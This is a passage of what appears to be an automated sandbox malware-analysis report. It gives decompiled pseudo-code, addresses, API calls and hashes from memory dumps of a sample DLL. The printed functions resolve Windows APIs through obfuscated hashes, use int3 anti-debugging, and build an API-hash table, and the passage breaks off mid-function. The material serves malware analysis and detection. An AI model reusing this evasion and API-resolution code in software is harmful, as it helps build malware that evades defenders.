						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6EA03698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6EA03064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6ea05bb3
0x6ea05bba
0x6ea05c09
0x6ea05c12
0x6ea05c18
0x6ea05c19
0x6ea05c0b
0x6ea05c0d
0x6ea05c0d
0x6ea05c2f
0x6ea05c43
0x6ea05c31
0x6ea05c3e
0x6ea05c40
0x6ea05c40
0x6ea05c45
0x6ea05c4a
0x6ea05c58
0x6ea05cc3
0x6ea05cc6
0x6ea05c5a
0x6ea05c5f
0x6ea05cac
0x6ea05cb0
0x6ea05cba
0x6ea05cba
0x6ea05cb0
0x6ea05c61
0x6ea05c6d
0x6ea05c72
0x6ea05c86
0x6ea05c88
0x6ea05c89
0x6ea05c8a
0x6ea05c8c
0x6ea05c8e
0x6ea05c8f
0x6ea05c8f
0x6ea05c92
0x6ea05c92
0x6ea05c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EA05C3E

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: fd453b4d94b8717904924a4bfaa5cf84b2704d2f9b2ed6019faa6721121f1a3e
Instruction ID: faab515d78610a7377d101cda648ed07fec90839dab7158902cf4ea9c40d226e
Opcode Fuzzy Hash: fd453b4d94b8717904924a4bfaa5cf84b2704d2f9b2ed6019faa6721121f1a3e
Instruction Fuzzy Hash: 3601703168020ABBF7E026F56D44FBB7B4CCF8225CF144835BA01651C4DE12ADD9C12C

Uniqueness

Uniqueness Score: -1.00%

Function 6EA05C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6EA05C01(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6EA03064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E9FC26C(_t23);
				if(E6E9FC280(_t23) != 0) {
					_t31[2] = E6EA035F0(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6EA03064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6EA03698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6EA03064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6ea05c01
0x6ea05c05
0x6ea05c09
0x6ea05c12
0x6ea05c18
0x6ea05c19
0x6ea05c0b
0x6ea05c0d
0x6ea05c0d
0x6ea05c2f
0x6ea05c43
0x6ea05c31
0x6ea05c3e
0x6ea05c40
0x6ea05c40
0x6ea05c45
0x6ea05c4a
0x6ea05c58
0x6ea05cc3
0x6ea05cc6
0x6ea05c5a
0x6ea05c5f
0x6ea05cac
0x6ea05cb0
0x6ea05cba
0x6ea05cba
0x6ea05cb0
0x6ea05c61
0x6ea05c6d
0x6ea05c72
0x6ea05c86
0x6ea05c88
0x6ea05c89
0x6ea05c8a
0x6ea05c8c
0x6ea05c8e
0x6ea05c8f
0x6ea05c8f
0x6ea05c92
0x6ea05c92
0x6ea05c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EA05C3E

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 58b5aa14198def0d92bf4b4c46dd0558d7dd4de209147f86e2b3c819d4d50927
Instruction ID: d8c6b549f857bd24ae3daff2bc529e10ae31cd7a130c34b0437da6bce59443fc
Opcode Fuzzy Hash: 58b5aa14198def0d92bf4b4c46dd0558d7dd4de209147f86e2b3c819d4d50927
Instruction Fuzzy Hash: DD012B3568120ABBF6E026F66D48FBB7B4CDF8265CF144835BA01651C5DE12ADD9C228

Uniqueness

Uniqueness Score: -1.00%

Function 6EA05E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6EA05E10(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6E9FC280(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6EA03064(0x8e844d1e, 0xba53868) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6ea05e14
0x6ea05e15
0x6ea05e17
0x6ea05e1d
0x6ea05e1f
0x6ea05e23
0x6ea05e23
0x6ea05e27
0x6ea05e33
0x6ea05e67
0x6ea05e67
0x00000000
0x6ea05e35
0x6ea05e3a
0x6ea05e3b
0x6ea05e4f
0x6ea05e60
0x6ea05e51
0x6ea05e5c
0x6ea05e5c
0x6ea05e65
0x6ea05e6d
0x6ea05e6f
0x6ea05e72
0x6ea05e77
0x6ea05e77
0x6ea05e7b
0x6ea05e80
0x00000000
0x00000000
0x00000000
0x6ea05e65

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,0BA53868,?,?,00000000,00000000,?,6EA05D48,?,?), ref: 6EA05E5C

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 81883a7f7b798860578a1a75a64f6229bbff1743631c676b12ff8142a5686874
Instruction ID: 03b74919d4b46aa4677454c18130e64f550544d3e964b7e76fd29489bfa06ac1
Opcode Fuzzy Hash: 81883a7f7b798860578a1a75a64f6229bbff1743631c676b12ff8142a5686874
Instruction Fuzzy Hash: 92F04931A08B11B9D7715AB9AC40A8773E8DFD1798F284A29F5C0A6184E660C8C08268

Uniqueness

Uniqueness Score: -1.00%

Function 6EA05E84, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA05E84(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6E9FC280(_t19) == 0) {
					_v12 = _a8;
					if(E6EA03064(0x8e844d1e, 0xed3ed1cc) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6EA035F0(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6ea05e87
0x6ea05e89
0x6ea05e95
0x6ea05e9f
0x6ea05eb5
0x6ea05ed4
0x6ea05eb7
0x6ea05ec8
0x6ea05ecc
0x6ea05eec
0x6ea05ece
0x6ea05ece
0x6ea05ece
0x6ea05ecc
0x6ea05ed5
0x6ea05eda
0x6ea05ee3
0x6ea05edc
0x6ea05edc
0x6ea05ede
0x6ea05ede
0x6ea05e97
0x6ea05e97
0x6ea05e97
0x6ea05ee9

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,8E844D1E,ED3ED1CC,?,?,?,6EA05D79,00000000,?,00000000,?), ref: 6EA05EC8

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c0cf3570fa8a4b5164650021c2e4412c76cd4a4c2dd5e69b9ffce37a9129dcb0
Instruction ID: 606e2d5e393c0a3ea538f37697c20c7524b08c3d42a476fb5f94fa8a6194d51f
Opcode Fuzzy Hash: c0cf3570fa8a4b5164650021c2e4412c76cd4a4c2dd5e69b9ffce37a9129dcb0
Instruction Fuzzy Hash: B0F0A931258307EFD761DEAABC10AAB77D9AF45258F244C2AA8D5C6140EB32D894C725

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA0564C(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6EA03064(0x150c05fc, 0xed2313f7) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6E9FE644(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6ea05656
0x6ea05658
0x6ea0565f
0x6ea05661
0x6ea05665
0x6ea05667
0x6ea0566a
0x6ea0566d
0x6ea0566d
0x6ea05687
0x00000000
0x00000000
0x6ea05698
0x6ea0569c
0x00000000
0x00000000
0x6ea056aa
0x6ea056ad
0x6ea056b2
0x6ea056b7
0x6ea056b7

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,150C05FC,ED2313F7,?,?,150C05FC,ED2313F7), ref: 6EA05698

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: ce57060c0c74c73790e298699b79442642d4b62f4a997544e107782f72be450e
Instruction ID: 02f67da3ca0cdf7e579e3e2245260770b43c5e60a28adb60a618fefb0cd1bfea
Opcode Fuzzy Hash: ce57060c0c74c73790e298699b79442642d4b62f4a997544e107782f72be450e
Instruction Fuzzy Hash: 36F0C8B520030AAFE7249E5ADC54DB7BBFCDFC1B54F04852DA0D542500EA31EC54C974

Uniqueness

Uniqueness Score: -1.00%

Function 6EA01030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6EA01030(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6EA0306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6EA0306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x150c05f8
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6ea0103e
0x6ea01040
0x6ea0104e
0x6ea01052
0x6ea0109b
0x00000000
0x6ea0109b
0x6ea01057
0x6ea01058
0x6ea0105a
0x6ea0105f
0x00000000
0x6ea01078
0x6ea0107c
0x6ea01089
0x6ea0108d
0x00000000
0x00000000
0x00000000
0x6ea01096

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,150C05F8,00000004,150C05FC,150C05FC,150C05FC), ref: 6EA01089

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction ID: 2527a5f2753b0107a5be7b21908dbe86db9fabd13ba9423ac84672d985027c5b
Opcode Fuzzy Hash: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction Fuzzy Hash: E7F04470244643ABFA4099B9BD64F7F32AD5BC161CF558838B5C0CA194EB74CE898629

Uniqueness

Uniqueness Score: -1.00%

Function 6EA03628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6EA03628(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6ea0d228 == 0xa33c83e5) {
					_t7 = E6EA03064(0x60a28c5c, 0x1c6ef387);
					 *0x6ea0d22c = E6EA03064(0x60a28c5c, 0x5e0afaa3);
					if( *0x6ea0d228 == 0xa33c83e5) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6ea0d228 = 0;
					}
				}
				_t3 = E6EA03064(0x60a28c5c, 0x45b68b68);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6ea0d228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x6ea03630
0x6ea03638
0x6ea0366b
0x6ea0367c
0x6ea03687
0x6ea03692
0x6ea03694
0x6ea03694
0x6ea03687
0x6ea03644
0x6ea0364b
0x00000000
0x6ea0364d
0x6ea0364d
0x6ea0364e
0x6ea03650
0x6ea03652
0x6ea03653
0x00000000
0x6ea03653

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,60A28C5C,5E0AFAA3,60A28C5C,1C6EF387,?,?,00000000,6E9FDE09,?,?), ref: 6EA03692

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 0bd0185b12100df2581a5a8c533a77ff0c75afe6ddb97b812be5e45fe2bacce2
Instruction ID: c8c1ccfa08fed3b7c821a6818bb3df5215b36e4be103ce1e5280e9b505c144c7
Opcode Fuzzy Hash: 0bd0185b12100df2581a5a8c533a77ff0c75afe6ddb97b812be5e45fe2bacce2
Instruction Fuzzy Hash: 17F059301172C0BEEA600DE7FC08C639398EF5424DF140C78F2C0A5100C6B088C8C63D

Uniqueness

Uniqueness Score: -1.00%

Function 01001D08, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 01001D76

Memory Dump Source

Source File: 00000001.00000002.808216210.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
Instruction ID: 3b27b87cd5d7166da8ac0fb6932ef9820b30e08221751266874fa78fa0d9de80
Opcode Fuzzy Hash: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
Instruction Fuzzy Hash: 124105B5E0521A9FDB04DF98D490AAEBBF0FF48310F15852EE849AB380D375A840CF84

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E9F1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6E9F1494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6E9FF584( &_v72, 0);
				_v60 = 0xe7942190;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v76, E6E9FF4CC( &_v76) + 0x10);
				E6E9FF4BC( &_v80, E6E9FF4CC( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x4074eca0;
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v84, E6E9FF4CC(_t325) + 0x10);
				E6E9FF4BC( &_v88, E6E9FF4CC( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0x742aedea;
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v92, E6E9FF4CC(_t329) + 0x10);
				E6E9FF4BC( &_v96, E6E9FF4CC( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x414fdf7;
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v100, E6E9FF4CC(_t333) + 0x10);
				E6E9FF4BC( &_v104, E6E9FF4CC( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xdb41c42;
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v108, E6E9FF4CC(_t337) + 0x10);
				E6E9FF4BC( &_v112, E6E9FF4CC( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0xb84fc88b;
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v116, E6E9FF4CC(_t341) + 0x10);
				E6E9FF4BC( &_v120, E6E9FF4CC( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0x3937949d;
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v124, E6E9FF4CC(_t345) + 0x10);
				E6E9FF4BC( &_v128, E6E9FF4CC( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x840d15ae;
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v132, E6E9FF4CC(_t349) + 0x10);
				E6E9FF4BC( &_v136, E6E9FF4CC( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0xe96b154c;
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v140, E6E9FF4CC(_t353) + 0x10);
				E6E9FF4BC( &_v144, E6E9FF4CC( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0x35237dcf;
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v148, E6E9FF4CC(_t357) + 0x10);
				E6E9FF4BC( &_v152, E6E9FF4CC( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0x60014416;
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v156, E6E9FF4CC(_t361) + 0x10);
				E6E9FF4BC( &_v160, E6E9FF4CC( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x9376283c;
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v164, E6E9FF4CC(_t365) + 0x10);
				E6E9FF4BC( &_v168, E6E9FF4CC( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x1c6ef387;
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v172, E6E9FF4CC(_t369) + 0x10);
				E6E9FF4BC( &_v176, E6E9FF4CC( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x45b68b68;
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v180, E6E9FF4CC(_t373) + 0x10);
				E6E9FF4BC( &_v184, E6E9FF4CC( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x5d116ac0;
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v188, E6E9FF4CC(_t377) + 0x10);
				E6E9FF4BC( &_v192, E6E9FF4CC( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x4b736e38;
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v196, E6E9FF4CC(_t381) + 0x10);
				E6E9FF4BC( &_v200, E6E9FF4CC( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x5e0afaa3;
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v204, E6E9FF4CC(_t385) + 0x10);
				E6E9FF4BC( &_v208, E6E9FF4CC( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6EA04200(0x60a28c5c, _t434);
				E6E9FF4BC( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6E9FF4BC( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6E9FF4BC( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6E9FF4BC( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6E9FF4BC( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6E9FF4BC( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6E9FF4BC( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6E9FF4BC( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6E9FF4BC( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6E9FF4BC( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6E9FF4BC( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6E9FF4BC( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6E9FF4BC( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6E9FF4BC( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
